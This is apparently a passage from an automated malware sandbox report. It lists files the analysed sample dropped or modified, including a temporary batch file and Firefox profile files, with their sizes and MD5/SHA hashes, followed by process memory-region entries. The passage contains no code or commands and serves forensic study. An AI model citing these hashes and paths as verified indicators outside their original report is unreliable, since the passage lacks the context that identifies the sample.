                              6efb2fa816fe7bb92e91233756781ffed7d72594d4ae927e0ea3fcb61744e9bd7dfe626c6e64445d0797815748765032b44d9ab1a3c6f22e46dd86cda5098a03

                            • C:\Users\Admin\AppData\Local\Temp\tmpFFFB.tmp.bat

                              Filesize

                              285B

                              MD5

                              9a403b56da0e8c8703a1d977de6342ed

                              SHA1

                              3bd01f416cd478d2af6dc7870fde50dec0835cd6

                              SHA256

                              bed559d08ee93474d7324718acf9a348cd70cb92baab355f854999288e12a724

                              SHA512

                              082772926b919dd10f168449c94bb954f035d1279d2857f6eb10e0adeda19a155bd30257d29f793e401775bd64f6092d046d99f833fcebb3759216b3362082bc

                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                              Filesize

                              479KB

                              MD5

                              09372174e83dbbf696ee732fd2e875bb

                              SHA1

                              ba360186ba650a769f9303f48b7200fb5eaccee1

                              SHA256

                              c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                              SHA512

                              b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                              Filesize

                              13.8MB

                              MD5

                              0a8747a2ac9ac08ae9508f36c6d75692

                              SHA1

                              b287a96fd6cc12433adb42193dfe06111c38eaf0

                              SHA256

                              32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                              SHA512

                              59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\AlternateServices.bin

                              Filesize

                              10KB

                              MD5

                              ead00978888b8d0e2627d1da4d79f65e

                              SHA1

                              78444d0aa77e15ecaa2202b18ce0f78817146fab

                              SHA256

                              17dd7dcf318635041b25129f5834c224d5abc300969fa77fdc5057d5fa573389

                              SHA512

                              7444a5a9ff25d631a2ae86238d9a547827eca602489f28da48d4740a352db347f1737ff56d5f3c425fb7a4c0d0eff534af9f7f3bdb25fe52e3280cc8fa60b4a9

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              25KB

                              MD5

                              43ff5b07a2d347d1f92fa32ac02f969c

                              SHA1

                              7eb4ff3764270feb45ee9308335a1a81d41432cc

                              SHA256

                              d22159322f94286f55d59863a9cd4f634a22fc1490772a98ac2dc7ab92b5ae31

                              SHA512

                              864b23c3f978c27cddb18efb115461c2857c4d5540dd7dd21c0b52375ee8de879cbafa1bc2059454f7443a252eae20e9832e08e76f65eed8d644233ca4f145a5

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              25KB

                              MD5

                              930860de2f611a78e2e0be8f9a93bfea

                              SHA1

                              639b488a1c8b7578cfec8b2d681c8a15449545a8

                              SHA256

                              3aaa0f819a0a8740302c72dc6058fe66149e17773ad0b4ab4c1026fc4aa93c1e

                              SHA512

                              ac7730c701fcfd5eb8dc7c263730bbfde3c198ace8beda144ff512387ec067f1b7daf3597d6fd41ded11de2c2902b293a529c18a209dd7572607d41a47810376

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              22KB

                              MD5

                              2019f4a38fd8134b1789ff40be2b8be0

                              SHA1

                              4b317d7b9bf4ba009f7de13f7a5b47f70c6eb272

                              SHA256

                              b96bb21f97cb6ddf33af7ad9f949d2f4bdf9834fd8a461ba792c6eaf81bb17ea

                              SHA512

                              86a619252844d62da2c1825a653b27022f76d5741d12a4778d9c89d90e44e8d72dfac528ffd9855f551e6817bbd018d4ed8e6bf18c7d263b480c08310d908193

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              22KB

                              MD5

                              46785b5a561e92c11e981c5028e45b84

                              SHA1

                              3816eb8fbccaab26550a8ec76cd359c71c725644

                              SHA256

                              fd321d9acce4eb888cf6011ce97d4e01f850925320229bddfe9ef972df24a056

                              SHA512

                              db7f78d4f95eee25c1904d35e3b46a0c275ba9469297d6a3d6821204f58e2072d74408f95a5f775d78176067799891539a04489be6bee26b552902b9176f48b7

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\db\data.safe.tmp

                              Filesize

                              23KB

                              MD5

                              a07305dd7efe61c76b0e54c459411b41

                              SHA1

                              b22604d2ff643e7cd3f909b15f29f9f087c29fbe

                              SHA256

                              d45a6ac90f3e849007d5ed1167e46db67d45d3a8491c682d404fa1143db7678d

                              SHA512

                              cfccd8480f0247cf9b77b25738613df1b0b07090bc687483a5970327f516fb5f5839e37ec4266f15e9fc055cb871c437712c2eb9c7a1be120a8b86c6399cc5d3

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\c8a6973b-a1e4-47d7-81c4-73ff2f5e2024

                              Filesize

                              982B

                              MD5

                              000d1794feb67d9b9eb906ef3e8e9a5f

                              SHA1

                              12d8a11bc20366c4f82e41b2e6bab0abadab1f48

                              SHA256

                              800be057d6973a51540dee0838e1f29e8420907dea01d61358375ece546e90b7

                              SHA512

                              79704f2c73b6b55bc1a8a793917de66ae07ce45214a9c47449f36036fdf680acc1530dab4d2e41340977d40511bf73fa585c5987434e52ee8efda73d3632ca71

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\datareporting\glean\pending_pings\fcd523d5-e350-49c7-b4d9-feccfc921035

                              Filesize

                              659B

                              MD5

                              7093b93fe2310a924813927abecdea4d

                              SHA1

                              e20934b199ee68d37b660e85f01a65b969443a78

                              SHA256

                              d52a3429d4c48a2d4cd15337907fc7a5ee6e0dfeafb66080992b3eb95736c7f5

                              SHA512

                              6f8455de05e218f3279b4b3a7c669a40cd6bed148c3e27ece7ec4a7c041b55ec86a2f97f0ac1ca7aa91d6185f0d1206ba3d2dffab24e41ae3572839e741a17fc

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                              Filesize

                              1.1MB

                              MD5

                              842039753bf41fa5e11b3a1383061a87

                              SHA1

                              3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                              SHA256

                              d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                              SHA512

                              d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                              Filesize

                              116B

                              MD5

                              2a461e9eb87fd1955cea740a3444ee7a

                              SHA1

                              b10755914c713f5a4677494dbe8a686ed458c3c5

                              SHA256

                              4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                              SHA512

                              34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                              Filesize

                              372B

                              MD5

                              bf957ad58b55f64219ab3f793e374316

                              SHA1

                              a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                              SHA256

                              bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                              SHA512

                              79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                              Filesize

                              17.8MB

                              MD5

                              daf7ef3acccab478aaa7d6dc1c60f865

                              SHA1

                              f8246162b97ce4a945feced27b6ea114366ff2ad

                              SHA256

                              bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                              SHA512

                              5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs-1.js

                              Filesize

                              12KB

                              MD5

                              76a74e49e915ebeaee7fd5c536f621e9

                              SHA1

                              afceca1f239f8292eed1ff751016608da0d69db3

                              SHA256

                              c36886713e59278ed3cb59116f11dc01c9c1ae61a68d90a6583b08d487090de2

                              SHA512

                              9daa93a9b7b15520291acd2a85e68f9fd5f3fdf76641328fb3e7bfe718b0199a8d52bbb1f944e95ffa71db8caf2aedce658e3cc00b800a87b2102b1f15ac0bf3

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs-1.js

                              Filesize

                              15KB

                              MD5

                              c76756a402ed20894d393456ff0be714

                              SHA1

                              96869cb323767e81c217947fe23be64fd6c6e7c7

                              SHA256

                              8f55003e6030ea8ede435dc3a07ac923e1e487e9fd109665d3c16813d2e1f771

                              SHA512

                              062e7ef0ab9eb6fbf8544973823a04e4c084a07af5264d9653c6bdaba849ff784bcacd414a6e99a7f7218ca1c7cd1df3103c878ec69170c73270f0cfc1921041

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

                              Filesize

                              10KB

                              MD5

                              25c2314f4d11a7628aadcbea47d404de

                              SHA1

                              4640b95c5552b2aaf2f896295b6a6faa566691db

                              SHA256

                              aebeb7e21c2661b0241423efadd1b73f9cc6357925ce337761ff0bff82a21933

                              SHA512

                              2ffca1dbbaf9f070bb984b0c15919bfbff22eb5bf5e9054cae527c255be937d642ea99b887fdd9ca576275674672bc6a479dc71939f3b7352e879d4f319fbe95

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

                              Filesize

                              10KB

                              MD5

                              cbdf3cf105f8f997e2805deb60a1d3e4

                              SHA1

                              5c21438a82fa7c94305c488c24bba78f6efcec9c

                              SHA256

                              39b3fbf1765eea99da7fde117b873214403e423424b74be31291228955f81341

                              SHA512

                              230aa4998b77069a39e88334041a205f893139cb5cec41c463ca97f8d197e84b2836bfd9589e3c900335e4ffd52169a92da48884bddcc10fd9b5a583eb5f94c2

                            • memory/400-67-0x00000162152F0000-0x000001621530E000-memory.dmp

                              Filesize

                              120KB

                            • memory/400-66-0x00000162153B0000-0x0000016215426000-memory.dmp

                              Filesize

                              472KB

                            • memory/400-69-0x00000162152E0000-0x00000162152EA000-memory.dmp

                              Filesize

                              40KB

                            • memory/400-61-0x0000016213140000-0x00000162136E2000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/1000-258-0x0000000000200000-0x00000000004AE000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/1000-259-0x0000000000200000-0x00000000004AE000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/1000-612-0x0000000000200000-0x00000000004AE000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/1000-249-0x0000000000200000-0x00000000004AE000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/1000-609-0x0000000000200000-0x00000000004AE000-memory.dmp

                              Filesize

                              2.7MB

                            • memory/1288-162-0x00000000001E0000-0x000000000066B000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/1288-103-0x00000000001E0000-0x000000000066B000-memory.dmp

                              Filesize

                              4.5MB

                            • memory/1540-205-0x0000000000A70000-0x0000000001110000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/1540-203-0x0000000000A70000-0x0000000001110000-memory.dmp

                              Filesize

                              6.6MB

                            • memory/1584-3115-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-3124-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-208-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-183-0x0000000010000000-0x000000001001C000-memory.dmp

                              Filesize

                              112KB

                            • memory/1584-218-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-601-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-636-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-3127-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-867-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-127-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-2025-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1584-3117-0x0000000000400000-0x0000000000C4E000-memory.dmp

                              Filesize

                              8.3MB

                            • memory/1596-106-0x0000000000600000-0x0000000000A93000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/1596-38-0x0000000000600000-0x0000000000A93000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/1596-40-0x0000000000601000-0x0000000000623000-memory.dmp

                              Filesize

                              136KB

                            • memory/1596-68-0x0000000000600000-0x0000000000A93000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/1596-41-0x0000000000600000-0x0000000000A93000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/1920-207-0x00000000005A0000-0x0000000000A4B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/1920-179-0x00000000005A0000-0x0000000000A4B000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/2332-136-0x000001F0D5F00000-0x000001F0D622E000-memory.dmp

                              Filesize

                              3.2MB

                            • memory/2332-155-0x000001F0D5200000-0x000001F0D5212000-memory.dmp

                              Filesize

                              72KB

                            • memory/2332-128-0x000001F0D4DB0000-0x000001F0D4E1A000-memory.dmp

                              Filesize

                              424KB

                            • memory/2332-130-0x000001F0D5020000-0x000001F0D50D2000-memory.dmp

                              Filesize

                              712KB

                            • memory/2332-131-0x000001F0D5120000-0x000001F0D5170000-memory.dmp

                              Filesize

                              320KB

                            • memory/2332-132-0x000001F0D5170000-0x000001F0D5192000-memory.dmp

                              Filesize

                              136KB

                            • memory/2332-135-0x000001F0D50D0000-0x000001F0D50F6000-memory.dmp

                              Filesize

                              152KB

                            • memory/2332-134-0x000001F0D51A0000-0x000001F0D51DA000-memory.dmp

                              Filesize

                              232KB

                            • memory/3852-108-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-20-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-3123-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-21-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-187-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-652-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-3126-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-39-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-42-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-515-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-1468-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-19-0x0000000000BA1000-0x0000000000BCF000-memory.dmp

                              Filesize

                              184KB

                            • memory/4012-18-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-104-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-3116-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-2661-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-627-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4012-37-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4532-2-0x00000000003B1000-0x00000000003DF000-memory.dmp

                              Filesize

                              184KB

                            • memory/4532-4-0x00000000003B0000-0x0000000000873000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4532-0-0x00000000003B0000-0x0000000000873000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4532-3-0x00000000003B0000-0x0000000000873000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4532-16-0x00000000003B0000-0x0000000000873000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/4532-1-0x00000000777D4000-0x00000000777D6000-memory.dmp

                              Filesize

                              8KB

                            • memory/5920-869-0x0000000000470000-0x0000000000903000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/5920-1347-0x0000000000470000-0x0000000000903000-memory.dmp

                              Filesize

                              4.6MB

                            • memory/5936-635-0x0000000000CD0000-0x0000000001991000-memory.dmp

                              Filesize

                              12.8MB

                            • memory/5936-776-0x0000000000CD0000-0x0000000001991000-memory.dmp

                              Filesize

                              12.8MB

                            • memory/5936-710-0x0000000000CD0000-0x0000000001991000-memory.dmp

                              Filesize

                              12.8MB

                            • memory/5936-711-0x0000000000CD0000-0x0000000001991000-memory.dmp

                              Filesize

                              12.8MB

                            • memory/6112-2971-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB

                            • memory/6112-2913-0x0000000000BA0000-0x0000000001063000-memory.dmp

                              Filesize

                              4.8MB